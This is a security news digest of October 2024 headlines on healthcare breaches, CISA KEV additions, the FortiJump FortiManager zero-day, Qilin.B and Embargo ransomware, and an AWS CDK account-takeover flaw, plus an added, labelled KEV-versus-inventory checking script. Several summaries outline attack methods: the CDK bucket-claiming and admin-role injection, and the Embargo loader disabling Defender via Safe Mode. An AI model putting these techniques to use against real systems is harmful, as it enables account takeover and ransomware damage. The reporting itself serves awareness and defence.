        Change Healthcare data breach impacted over 100 million people

        financial
        2024-10-25 https://securityaffairs.com/170258/data-breach/change-healthcare-data-breach.html
        The Change Healthcare data breach in February 2024 impacted over 100 million people, the largest-ever healthcare data breach in the US. UnitedHealth Group announced that the data breach suffered by Change Healthcare in February 2024 impacted more than 100 million individuals. On February 21, a cyber attack disrupted the IT operations of the healthcare organization, more than […]

        Autosummary: “Our experts are working to address the matter and we are working closely with law enforcement and leading third-party consultants, Mandiant and Palo Alto Network, on this attack against Change Healthcare’s systems” Compromised data includes names, addresses, dates of birth, phone numbers, driver’s license or state ID numbers, Social Security numbers, diagnosis and treatment information, medical record numbers, billing codes, insurance member IDs, and other types of information. "


        OnePoint Patient Care data breach impacted 795916 individuals

        financial
        2024-10-25 https://securityaffairs.com/170247/data-breach/onepoint-patient-care-data-breach.html
        US hospice pharmacy OnePoint Patient Care suffered a data breach that exposed the personal info of approximately 800,000 individuals. OnePoint Patient Care is a U.S.-based pharmacy specializing in hospice and palliative care services, providing customized medications and support for patients with advanced illnesses. It partners with healthcare providers to manage and deliver complex medication regimens […] "

        Autosummary: The compromised data includes names, residence information, medical records, diagnosis, prescription details, and, for some, Social Security numbers. "


        U.S. CISA adds Cisco ASA and FTD, and RoundCube Webmail bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-25 https://securityaffairs.com/170231/security/u-s-cisa-adds-cisco-asa-and-ftd-and-roundcube-webmail-bugs-to-its-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco ASA and FTD, and RoundCube Webmail bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: This week, Cisco addressed multiple vulnerabilities in Adaptive Security Appliance (ASA), Secure Firewall Management Center (FMC), […] "

        Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:
        CVE-2024-20481 Cisco ASA and FTD Denial-of-Service Vulnerability
        CVE-2024-37383 RoundCube Webmail Cross-Site Scripting (XSS) Vulnerability
        This week, Cisco addressed multiple vulnerabilities in Adaptive Security Appliance (ASA), Secure Firewall Management Center (FMC), and Firepower Threat Defense (FTD) products, including an actively exploited flaw tracked as CVE-2024-20481. (Pierluigi Paganini, October 25, 2024.)
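        A KEV addition only matters if you know which of your own assets carry the listed product and whether they are inside the remediation window. The script below is an added example that cross-references a KEV excerpt against an asset inventory; it is not CISA's or Security Affairs' code. The JSON shape follows CISA's public feed (known_exploited_vulnerabilities.json), but the two entries are a constructed excerpt with illustrative due dates, and the inventory is invented.

```python
"""Added example (not CISA's code): which inventory hosts still owe a fix for
a KEV entry, and by when. KEV excerpt and inventory below are constructed."""
import json
from datetime import date

# Constructed excerpt in the shape of CISA's known_exploited_vulnerabilities.json.
# The CVEs are the two named in the article; the dates are illustrative.
KEV_SAMPLE = json.loads("""
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2024-20481", "vendorProject": "Cisco",
     "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)",
     "vulnerabilityName": "Cisco ASA and FTD Denial-of-Service Vulnerability",
     "dateAdded": "2024-10-24", "dueDate": "2024-11-14",
     "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-37383", "vendorProject": "RoundCube",
     "product": "Webmail",
     "vulnerabilityName": "RoundCube Webmail Cross-Site Scripting (XSS) Vulnerability",
     "dateAdded": "2024-10-24", "dueDate": "2024-11-14",
     "knownRansomwareCampaignUse": "Unknown"}
  ]
}
""")

# Constructed inventory: vendor, product keywords, and CVEs already remediated.
INVENTORY = [
    {"host": "fw-edge-01", "vendor": "Cisco", "product_keywords": ["ASA"],
     "patched_cves": []},
    {"host": "mail-01", "vendor": "RoundCube", "product_keywords": ["Webmail"],
     "patched_cves": ["CVE-2024-37383"]},
    {"host": "wiki-01", "vendor": "Atlassian", "product_keywords": ["Confluence"],
     "patched_cves": []},
]


def entry_matches(entry, asset):
    """Vendor must match (case-insensitive); any product keyword in the KEV product string suffices."""
    if entry["vendorProject"].lower() != asset["vendor"].lower():
        return False
    product = entry["product"].lower()
    return any(k.lower() in product for k in asset["product_keywords"])


def find_exposures(kev, inventory, today):
    """Hosts affected by a KEV entry they have not patched, soonest due first.
    `today` may be a date or an ISO string."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    exposures = []
    for entry in kev["vulnerabilities"]:
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if not entry_matches(entry, asset):
                continue
            if entry["cveID"] in asset["patched_cves"]:
                continue
            exposures.append({
                "host": asset["host"],
                "cve": entry["cveID"],
                "name": entry["vulnerabilityName"],
                "due": due.isoformat(),
                "days_left": (due - today).days,  # negative once overdue
                "ransomware_use": entry.get("knownRansomwareCampaignUse", "Unknown"),
            })
    exposures.sort(key=lambda e: (e["days_left"], e["host"]))
    return exposures


if __name__ == "__main__":
    for e in find_exposures(KEV_SAMPLE, INVENTORY, date.today()):
        state = "OVERDUE" if e["days_left"] < 0 else f"{e['days_left']} days left"
        print(f"{e['host']}: {e['cve']} ({e['name']}) due {e['due']}, {state}")
```

        Swap KEV_SAMPLE for the downloaded feed and INVENTORY for your CMDB export; the keyword match is intentionally loose because KEV product strings bundle several products (as the ASA/FTD entry does), so a host is matched on vendor plus any one product keyword.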


        Mining giants sign $30bn settlement for 2015 Brazil dam collapse

        latam
        2024-10-25 https://www.bbc.com/news/articles/cx2dk8yy4kjo
        The dam collapse released toxic waste and mud, which flooded nearby towns, rivers and forests. "

        Autosummary: The dam collapse in 2015 destroyed many villages and engulfed homes. The mining giants BHP and Vale have signed a deal with the Brazilian government to pay nearly $30bn (£23bn) in compensation for the Mariana dam collapse in 2015 that caused the country's worst environmental disaster.


        Venezuela vents its anger at Brazil's Brics snub

        latam industry
        2024-10-25 https://www.bbc.com/news/articles/c624m4kgrg3o
        Venezuela criticises Brazil's decision to veto its admission to the Brics group of emerging economies.

        Autosummary: Jair Bolsonaro has applied against Venezuela for years, reproducing the hatred, exclusion and intolerance promoted from the centres of power in the West," the Venezuelan foreign ministry said in a statement. "


        Rare footage of a cartel gun battle near US-Mexico border

        latam
        2024-10-25 https://www.bbc.com/news/videos/c0lpwk7yj0yo
        Texas law enforcement said the shootout was between factions of the Gulf Cartel. "



        AI and deepfakes fuel phishing scams, making detection harder

        financial
        2024-10-24 https://www.helpnetsecurity.com/2024/10/24/ai-impersonation-cyberattack-vector/

        AI impersonation is now the hardest vector for cybersecurity professionals to protect companies against, according to Teleport. The study, which surveyed 250 senior US and UK decision-makers, shows that social engineering remains one of the top tactics cybercriminals use to install malware and steal sensitive data, with the advancement of AI and deepfakes further fueling the effectiveness of phishing scams. Advanced phishing tactics on the rise When asked to rank the difficulty of each attack … More

        The post AI and deepfakes fuel phishing scams, making detection harder appeared first on Help Net Security.


        Autosummary: As it stands, credentials are pretty much littered across the many disparate layers of the technology stack – Kubernetes, servers, cloud APIs, specialized dashboards and databases, and more.” "


        What’s more important when hiring for cybersecurity roles?

        ciber
        2024-10-24 https://www.helpnetsecurity.com/2024/10/24/skills-certifications/

        When building a cybersecurity team, you likely asked yourself, “Should I focus on certifications or real-world skills?” And since you rarely encounter entry-level candidates who can hit the ground running, naturally, you’d consider a candidate with both. But that’s not always the best option unless you have the time, money, and patience. One of these factors usually has a priority over the other. Your starting point or a nice-to-have? ISACA’s State of Cybersecurity 2024 Report … More

        The post What’s more important when hiring for cybersecurity roles? appeared first on Help Net Security.

        "

        Autosummary: Sometimes, you’ll need certifications; other times, you’ll need skills, and if you’re lucky, you’ll get a good mix of both! If risk mitigation is your priority, then skilled candidates have the hands-on experience to resolve issues faster; however, they come with a higher initial cost. And since you rarely encounter entry-level candidates who can hit the ground running, naturally, you’d consider a candidate with both. "


        Fortinet Warns of Critical Vulnerability in FortiManager Under Active Exploitation

        exploits
        2024-10-24 https://thehackernews.com/2024/10/fortinet-warns-of-critical.html
        Fortinet has confirmed details of a critical security flaw impacting FortiManager that has come under active exploitation in the wild. Tracked as CVE-2024-47575 (CVSS score: 9.8), the vulnerability is also known as FortiJump and is rooted in the FortiGate to FortiManager (FGFM) protocol. "A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may "

        Autosummary: "


        U.S. CISA adds Fortinet FortiManager flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-24 https://securityaffairs.com/170175/hacking/us-cisa-adds-fortinet-fortimanager-flaw-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiManager flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Fortinet FortiManager missing authentication vulnerability CVE-2024-47575 (CVSS v4 score: 9.8) to its Known Exploited Vulnerabilities (KEV) catalog. A missing authentication flaw in FortiManager and FortiManager Cloud versions allows attackers […] "

        Autosummary: The vulnerability impacts the following versions (product: affected versions – solution):
        FortiManager 7.6: 7.6.0 – upgrade to 7.6.1 or above
        FortiManager 7.4: 7.4.0 through 7.4.4 – upgrade to 7.4.5 or above
        FortiManager 7.2: 7.2.0 through 7.2.7 – upgrade to 7.2.8 or above
        FortiManager 7.0: 7.0.0 through 7.0.12 – upgrade to 7.0.13 or above
        FortiManager 6.4: 6.4.0 through 6.4.14 – upgrade to 6.4.15 or above
        FortiManager 6.2: 6.2.0 through 6.2.12 – upgrade to 6.2.13 or above
        FortiManager Cloud 7.6: not affected – not applicable
        FortiManager Cloud 7.4: 7.4.1 through 7.4.4 – upgrade to 7.4.5 or above
        FortiManager Cloud 7.2: 7.2.1 through 7.2.7 – upgrade to 7.2.8 or above
        FortiManager Cloud 7.0: 7.0.1 through 7.0.12 – upgrade to 7.0.13 or above
        FortiManager Cloud 6.4: 6.4 all versions – migrate to a fixed release
        Fortinet published IOCs to detect exploitation attempts of this issue and provided workarounds to mitigate the risk of attacks exploiting this vulnerability. "


        Fortinet FortiManager flaw exploited in zero-day attacks (CVE-2024-47575)

        exploits
        2024-10-24 https://www.helpnetsecurity.com/2024/10/24/cve-2024-47575/

        Fortinet has finally made public information about CVE-2024-47575, a critical FortiManager vulnerability that attackers have exploited as a zero-day. About CVE-2024-47575 CVE-2024-47575 is a vulnerability stemming from missing authentication for a critical function in FortiManager’s fgfmd daemon. Remote, unauthenticated attackers could exploit the flaw to execute arbitrary code or commands via specially crafted requests. It affects various versions of FortiManager and FortiManager Cloud, as well as some older FortiAnalyzer models. “Reports have shown this vulnerability … More

        The post Fortinet FortiManager flaw exploited in zero-day attacks (CVE-2024-47575) appeared first on Help Net Security.

        "

        Autosummary: “The threat actor has been combo’ing the other CISA KEV vuln (from earlier in the year) to enter FortiGate, then used this to enter the managing FortiManager, and then using that to go back downstream – i.e. jumping over zoned networks,” he summed up the in-the-wild attacks. "


        Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA

        financial
        2024-10-24 https://thehackernews.com/2024/10/why-phishing-resistant-mfa-is-no-longer.html
        Sometimes, it turns out that the answers we struggled so hard to find were sitting right in front of us for so long that we somehow overlooked them. When the Department of Homeland Security, through the Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the FBI, issues a cybersecurity warning and prescribes specific action, it’s a pretty good idea to at least read the "

        Autosummary: Even more troubling, RISK & INSURANCE, a leading publication from the cybersecurity insurance industry, reported that the median ransom grew to $20 million in 2023, up significantly from $1.4 million in 2022, while actual payments surged to $6.5 million, compared to $335,000 previously. Cybercriminals are easily bypassing legacy MFA solutions through phishing, SIM swapping, Man-in-the-Middle (MitM) attacks, and more. In their advisory AA24-242A, DHS/CISA and the FBI told the entire cybercriminal-stopping world that to stop ransomware attacks, organizations needed to implement phishing-resistant MFA and ditch SMS-based OTP MFA. "


        Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices

        exploits
        2024-10-24 https://thehackernews.com/2024/10/lazarus-group-exploits-google-chrome.html
        The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the "

        Autosummary: "On the surface, this website resembled a professionally designed product page for a decentralized finance (DeFi) NFT-based (non-fungible token) multiplayer online battle arena (MOBA) tank game, inviting users to download a trial version," Kaspersky researchers Boris Larin and Vasily Berdnikov said. "


        FortiJump flaw CVE-2024-47575 has been exploited in zero-day attacks since June 2024

        exploits
        2024-10-24 https://securityaffairs.com/170189/hacking/fortijump-flaw-exploited-since-june-2024.html
        The “FortiJump” flaw (CVE-2024-47575) has been exploited in zero-day attacks since June 2024, impacting over 50 servers, says Mandiant. A new report published by Mandiant states that the recently disclosed Fortinet FortiManager flaw “FortiJump” CVE-2024-47575 (CVSS v4 score: 9.8) has been exploited since June 2024 in zero-day attacks on over 50 servers. The vulnerability is […] "

        Autosummary: The “FortiJump” flaw (CVE-2024-47575) has been exploited in zero-day attacks since June 2024, impacting over 50 servers, says Mandiant (Pierluigi Paganini, October 24, 2024). For configuration, the “fgfm-deny-unknown” setting must be enabled using the following command:
        config system global
        set fgfm-deny-unknown enable
        end "


        New Qilin ransomware encryptor features stronger encryption, evasion

        exploits ransomware
        2024-10-24 https://www.bleepingcomputer.com/news/security/new-qilin-ransomware-encryptor-features-stronger-encryption-evasion/
        A new Rust-based variant of the Qilin (Agenda) ransomware strain, dubbed "Qilin.B," has been spotted in the wild, featuring stronger encryption, better evasion from security tools, and the ability to disrupt data recovery mechanisms. [...] "

        Autosummary: Veeam (backup and recovery); Windows Volume Shadow Copy Service (system backup and recovery); SQL database services (enterprise data management); Sophos (security and antivirus software); Acronis Agent (backup and recovery service); SAP (enterprise resource planning). Existing volume shadow copies are wiped to prevent easy system restoration, and Windows Event Logs are cleared to hinder forensic analysis. "


        Mandiant says new Fortinet flaw has been exploited since June

        exploits
        2024-10-24 https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/
        A new Fortinet FortiManager flaw dubbed "FortiJump" and tracked as CVE-2024-47575 has been exploited since June 2024 in zero-day attacks on over 50 servers, according to a new report by Mandiant. [...] "

        Autosummary: Attacker-controlled FortiManager-VM Source: Mandiant As part of the attack, Mandiant says four files were created: /tmp/.tm - A gzip archive containing exfiltrated information about managed FortiGate devices, information about the FortiManager server, and its global database. "


        NotLockBit: ransomware discovery serves as wake-up call for Mac users

        exploits ransomware
        2024-10-24 https://www.tripwire.com/state-of-security/notlockbit-rransomware-discovery-serves-wake-call-mac-users
        Historically, Mac users haven't had to worry about malware as much as their Windows-using cousins. But that doesn't mean that Mac users should be complacent. And the recent discovery of a new malware strain emphasises that the threat - even if much smaller than on Windows - remains real. Read more in my article on the Tripwire State of Security blog. "

        Autosummary: Although malware targeting Apple devices actually predates viruses written for PCs, and there have been some families of malware that have presented a significant threat for both operating systems (for instance, the Word macro viruses that hit computers hard from 1995 onwards), it is generally the case that you're simply a lot less likely to encounter malware on your Mac than you are on your Windows PC. "


        AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks

        exploits
        2024-10-24 https://thehackernews.com/2024/10/aws-cloud-development-kit-vulnerability.html
        Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances. "The impact of this issue could, in certain scenarios, allow an attacker to gain administrative access to a target AWS account, resulting in a full account takeover," Aqua said in a report shared "

        Autosummary: However, for this to succeed, the attacker is expected to fulfil the below prerequisites: claim the bucket with the predictable name and allow public access, and create a Lambda function that will inject a malicious admin role or backdoor into a given CloudFormation template file whenever it's uploaded to the bucket. In the final stage, when the user deploys the CDK using "cdk deploy," not only does the process send the template to the replica bucket, but it also injects an admin role that the attacker can assume to ultimately gain control of the victim's account. Aqua said the naming pattern of the IAM roles created by AWS CDK follows the structure "cdk-{Qualifier}-{Description}-{Account-ID}-{Region}," where each of the fields is explained below: Qualifier, a unique, nine-character string value that defaults to "hnb659fds" although it can be customized during the bootstrapping phase; Description, resource description (e.g., cfn-exec-role); Account-ID, AWS account ID of the environment; Region, AWS region of the environment. In a similar vein, the S3 bucket created during bootstrapping follows the naming pattern "cdk-{Qualifier}-assets-{Account-ID}-{Region}". "


        Cisco Issues Urgent Fix for ASA and FTD Software Vulnerability Under Active Attack

        exploits
        2024-10-24 https://thehackernews.com/2024/10/cisco-issues-urgent-fix-for-asa-and-ftd.html
        Cisco on Wednesday said it has released updates to address an actively exploited security flaw in its Adaptive Security Appliance (ASA) that could lead to a denial-of-service (DoS) condition. The vulnerability, tracked as CVE-2024-20481 (CVSS score: 5.8), affects the Remote Access VPN (RAVPN) service of Cisco ASA and Cisco Firepower Threat Defense (FTD) Software. Arising due to resource "

        Autosummary: A presence of static accounts with hard-coded passwords vulnerability in FTD Software for Cisco Firepower 1000, 2100, 3100, and 4200 Series that could allow an unauthenticated, local attacker to access an affected system using static credentials (CVSS score: 9.3). CVE-2024-20424 (CVSS score: 9.9) - "


        Insurance admin Landmark says data breach impacts 800,000 people

        financial
        2024-10-24 https://www.bleepingcomputer.com/news/security/insurance-admin-landmark-says-data-breach-impacts-800-000-people/
        Insurance administrative services company Landmark Admin warns that a data breach impacts over 800,000 people from a May cyberattack. [...] "

        Autosummary: "


        New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics

        exploits ransomware industry
        2024-10-24 https://thehackernews.com/2024/10/new-qilinb-ransomware-variant-emerges.html
        Cybersecurity researchers have discovered an advanced version of the Qilin ransomware sporting increased sophistication and tactics to evade detection. The new variant is being tracked by cybersecurity firm Halcyon under the moniker Qilin.B. "Notably, Qilin.B now supports AES-256-CTR encryption for systems with AESNI capabilities, while still retaining Chacha20 for systems that lack this support "

        Autosummary: "Out of the 99 healthcare organizations that admitted to paying the ransom and disclosed the ransom paid, the median payment was $1.5 million, and the average payment was $4.4 million," the tech giant said. "


        Cisco fixed tens of vulnerabilities, including an actively exploited one

        exploits
        2024-10-24 https://securityaffairs.com/170203/breaking-news/cisco-fixed-tens-of-vulnerabilities-including-actively-exploited-one.html
        Cisco patched vulnerabilities in ASA, FMC, and FTD products, including one actively exploited in a large-scale brute-force attack campaign. Cisco addressed multiple vulnerabilities in Adaptive Security Appliance (ASA), Secure Firewall Management Center (FMC), and Firepower Threat Defense (FTD) products, including an actively exploited flaw tracked as CVE-2024-20481. The vulnerability CVE-2024-20481 (CVSS score of 5.8) is […] "

        Autosummary: Cisco fixed tens of vulnerabilities, including an actively exploited one (Pierluigi Paganini, October 24, 2024). Cisco patched vulnerabilities in ASA, FMC, and FTD products, including one actively exploited in a large-scale brute-force attack campaign. "


        Apple creates Private Cloud Compute VM to let researchers find bugs

        exploits
        2024-10-24 https://www.bleepingcomputer.com/news/apple/apple-creates-private-cloud-compute-vm-to-let-researchers-find-bugs/
        Apple created a Virtual Research Environment to allow public access to testing the security of its Private Cloud Compute system, and released the source code for some "key components" to help researchers analyze the privacy and safety features on the architecture. [...] "

        Autosummary: To make it easier for researchers, Apple decided to release the source code for some PCC components that implement security and privacy requirements: The CloudAttestation project - responsible for constructing and validating the PCC node’s attestations. "


        Henry Schein discloses data breach a year after ransomware attack

        financial exploits ransomware
        2024-10-24 https://www.bleepingcomputer.com/news/security/henry-schein-discloses-data-breach-a-year-after-ransomware-attack/
        Henry Schein has finally disclosed a data breach following at least two back-to-back cyberattacks in 2023 by the BlackCat Ransomware gang, revealing that over 160,000 people had their personal information stolen. [...] "

        Autosummary: "


        Pwn2Own Ireland 2024 Day 2: participants demonstrated an exploit against Samsung Galaxy S24

        exploits
        2024-10-24 https://securityaffairs.com/170221/hacking/pwn2own-ireland-2024-day-two.html
        On the second day of Pwn2Own Ireland 2024, researchers demonstrated an exploit for the Samsung Galaxy S24. On day two of Pwn2Own Ireland 2024, hackers demonstrated attacks against 51 zero-day vulnerabilities, earning a total of $358,625 in prizes, which adds to the $516,250 earned by participants on the first day of the event. With the […] "

        Autosummary: Zero Day Initiative (@thezdi), October 23, 2024: Corentin BAYET (@OnlyTheDuck) of @Reverse_Tactics chained three bugs to exploit the QNAP QHora-322 to QNAP TS-464, earning $41,750 and 8.5 Master of Pwn points, though one bug had been used before. "


        Cybersecurity jobs available right now: October 23, 2024

        ciber
        2024-10-23 https://www.helpnetsecurity.com/2024/10/23/cybersecurity-jobs-available-right-now-october-23-2024/

        Cybersecurity Engineer Texas Instruments | USA | On-site – View job details As a Cybersecurity Engineer, you will design, implement and maintain cybersecurity controls for security tools to help drive zero trust and secure by design principles across complex environments. Validate and test security configurations and controls to a variety of security (e.g., firewalls, email gateway, WAFs, DLP, endpoint protection, baselines, etc.). Cyber Security Architect – Product Security Honeywell | USA | On-site – View … More

        The post Cybersecurity jobs available right now: October 23, 2024 appeared first on Help Net Security.

        "

        Autosummary:
        Senior Manager, IT – Vulnerability and Attack Surface Management | Kraft Heinz | Canada | On-site – View job details. As a Senior Manager, IT – Vulnerability and Attack Surface Management, you will ensure timely identification, analysis, and remediation of vulnerabilities across all IT assets, including applications, servers, networks, and endpoints.
        Software Security Manager | Ingenico | France | On-site – View job details. As a Software Security Manager, you will define the software security strategy aligned with company objectives and regulatory requirements and elaborate with development & operation teams the methods, tools and policies to support the security model, in particular Security by design, Secure Software Development Life Cycle, Vulnerability management, security-awareness trainings.
        Cyber Security Architect – Product Security | Honeywell | USA | On-site – View job details. As a Cyber Security Architect – Product Security, you will support secure lifecycle process activities for SaaS and On-Prem Offerings, including security requirements, threat modeling, risk assessment, analysis of findings from penetration tests, and tools.
        Deputy CISO | Novanta | USA | Remote – View job details. As a Deputy CISO, you will be responsible for developing and maintaining a security architecture process, the security operations center (SOC), network operations center (NOC) related to security, and compliance strategy that enables the enterprise capabilities that are clearly aligned with business, technology, threat drivers, data privacy and regulations. "


        Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks

        exploits ransomware
        2024-10-23 https://thehackernews.com/2024/10/ransomware-gangs-use-lockbits-fame-to.html
        Threat actors have been observed abusing Amazon S3 (Simple Storage Service) Transfer Acceleration feature as part of ransomware attacks designed to exfiltrate victim data and upload them to S3 buckets under their control. "Attempts were made to disguise the Golang ransomware as the notorious LockBit ransomware," Trend Micro researchers Jaromir Horejsi and Nitesh Surana said. "However, such is "

        Autosummary: Some of the vulnerabilities exploited by Akira affiliates are listed below - "Throughout 2024, Akira has targeted a significant number of victims, with a clear preference for organizations in the manufacturing and professional, scientific, and technical services sectors," Talos researchers James Nutland and Michael Szeliga said. "


        Fortinet warns of new critical FortiManager flaw used in zero-day attacks

        exploits
        2024-10-23 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/
        Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices. [...] "

        Autosummary: Log entries will show that the threat actors issued API commands to add these unregistered "localhost" devices:
        type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded"
        Another log entry shared by Fortinet was used to edit device settings:
        type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"
        Fortinet says that rogue FortiGate devices were seen using the serial number FMG-VMTM23017412, which appears to be the format used by FortiGate-VM virtual machines. The flaw impacts FortiManager versions 7.6.0, 7.4.0 - 7.4.4, 7.2.0 - 7.2.7, 7.0.0 - 7.0.12, 6.4.0 - 6.4.14, and 6.2.0 through 6.2.12. "We got breached on this one weeks before it hit "advance notifications" - 0-day I guess," reads a now-deleted comment on Reddit. "


        Hackers exploit 52 zero-days on the first day of Pwn2Own Ireland

        exploits
        2024-10-23 https://www.bleepingcomputer.com/news/security/hackers-exploit-52-zero-days-on-the-first-day-of-pwn2own-ireland/
        On the first day of Pwn2Own Ireland, participants demonstrated 52 zero-day vulnerabilities across a range of devices, earning a total of $486,250 in cash prizes. [...] "

        Autosummary: There are three more days left in the competition and participants will try to exploit security issues found in fully patched SOHO devices, including printers, NAS systems, WiFi cameras, routers, smart speakers, mobile phones (Samsung Galaxy S24), for a portion of the $1 million pool prize. "


        Permiso State of Identity Security 2024: A Shake-up in Identity Security Is Looming Large

        government
        2024-10-23 https://thehackernews.com/2024/10/permiso-state-of-identity-security-2024.html
        Identity security is front, and center given all the recent breaches that include Microsoft, Okta, Cloudflare and Snowflake to name a few. Organizations are starting to realize that a shake-up is needed in terms of the way we approach identity security both from a strategic but also a technology vantage point.  Identity security is more than just provisioning access  The conventional view "

        Autosummary: This view was reflected as a broad theme in the Permiso Security State of Identity Security Report (2024), which finds that despite growing levels of confidence in the ability to identify security risk, nearly half of organizations (45%) remain "concerned" or "extremely concerned" about their current tools being able to detect and protect against identity security attacks. Despite 86% of organizations stating that they can identify their riskiest identities (human and non-human), nearly half (45%) suffered an identity security incident in the last year, with impersonation attacks the leading threat vector -- revealing that social engineering-based attacks continue to be a pervasive threat to organizations. "


        CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094)

        exploits
        2024-10-23 https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html
        A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active exploitation. The vulnerability, tracked as CVE-2024-38094 (CVSS score: 7.2), has been described as a deserialization vulnerability impacting SharePoint that could result "

        Autosummary: Assigned the CVE identifier CVE-2024-44068 (CVSS score of 8.1), it has been addressed as of October 7, 2024, with the South Korean electronics giant characterizing it as a "use-after-free in the mobile processor [that] leads to privilege escalation. "


        U.S. CISA adds Microsoft SharePoint flaw to its Known Exploited Vulnerabilities catalog

        exploits
        2024-10-23 https://securityaffairs.com/170157/security/u-s-cisa-adds-microsoft-sharepoint-flaw-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft SharePoint flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the Microsoft SharePoint Deserialization Vulnerability CVE-2024-38094 (CVSS v4 score: 7.2) to its Known Exploited Vulnerabilities (KEV) catalog. An attacker with Site Owner permissions can exploit a vulnerability to inject and […] "

        Autosummary: U.S. CISA adds Microsoft SharePoint flaw to its Known Exploited Vulnerabilities catalog (Pierluigi Paganini, October 23, 2024). "


        Lazarus hackers used fake DeFi game to exploit Google Chrome zero-day

        exploits
        2024-10-23 https://www.bleepingcomputer.com/news/security/lazarus-hackers-used-fake-defi-game-to-exploit-google-chrome-zero-day/
        The North Korean Lazarus hacking group exploited a Google Chrome zero-day tracked as CVE-2024-4947 through a fake decentralized finance (DeFi) game targeting individuals in the cryptocurrency space. [...] "

        Autosummary: It collected CPU, BIOS, and OS information, performed anti-VM and anti-debugging checks, and sent the information to Lazarus' command-and-control (C2) server. "


        New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection

        financial exploits industry
        2024-10-23 https://thehackernews.com/2024/10/new-grandoreiro-banking-malware.html
        New variants of a banking malware called Grandoreiro have been found to adopt new tactics in an effort to bypass anti-fraud measures, indicating that the malicious software is continuing to be actively developed despite law enforcement efforts to crack down on the operation. "Only part of this gang was arrested: the remaining operators behind Grandoreiro continue attacking users all over the "

        Autosummary: "Grandoreiro searches for anti-malware solutions such as AVAST, Bitdefender, Nod32, Kaspersky, McAfee, Windows Defender, Sophos, Virus Free, Adaware, Symantec, Tencent, Avira, ActiveScan, and CrowdStrike," the company said. "


        Embargo ransomware: Rock’n’Rust

        exploits ransomware
        2024-10-23 https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrust/
        Novice ransomware group Embargo is testing and deploying a new Rust-based toolkit "

        Autosummary: The loader achieves this using a combination of Windows command line tools bcdedit, sc, and reg to: set Safe Mode as the default boot mode, disable Windows Defender in Safe Mode, create a service, irnagentd, that executes the loader after the system is rebooted into Safe Mode, and restart the system. There are four stages that the attacker distinguishes in their log messages – they use a different prefix for logging errors in each of them: [dec] – payload decryption, [exec] – ransomware execution, [execk] – MS4Killer execution, and [kler] – MS4Killer run (this prefix is used when MS4Killer exits unexpectedly). Other prefixes seen in the log messages: [sc delete] – creating or deleting the service irnagentd, [reg] and [reg-del] – modifying Windows registry, and [setsb] – using the bcdedit.exe command line tool to set Safe Mode on next restart.
        Execution: In all of the observed cases, the persistence of the loader was achieved by a scheduled task, Perf_sys (Figure 5), created by an already elevated system user BITCH\Administrator. Next, it does the same for the ransomware payload, which is decrypted from a.cache, saved as pay.exe, and executed. During cleanup, the loader terminates the MS4Killer process, deletes the decrypted payloads and the vulnerable driver dropped by MS4Killer, and creates the flow control file stop.exe. After that, it does a “Safe Mode cleanup” – it deletes the decrypted ransomware file pay.exe, creates the control flow file stop.exe to prevent double encryption, deletes the persistence service irnagentd, and reboots the system back into normal mode.
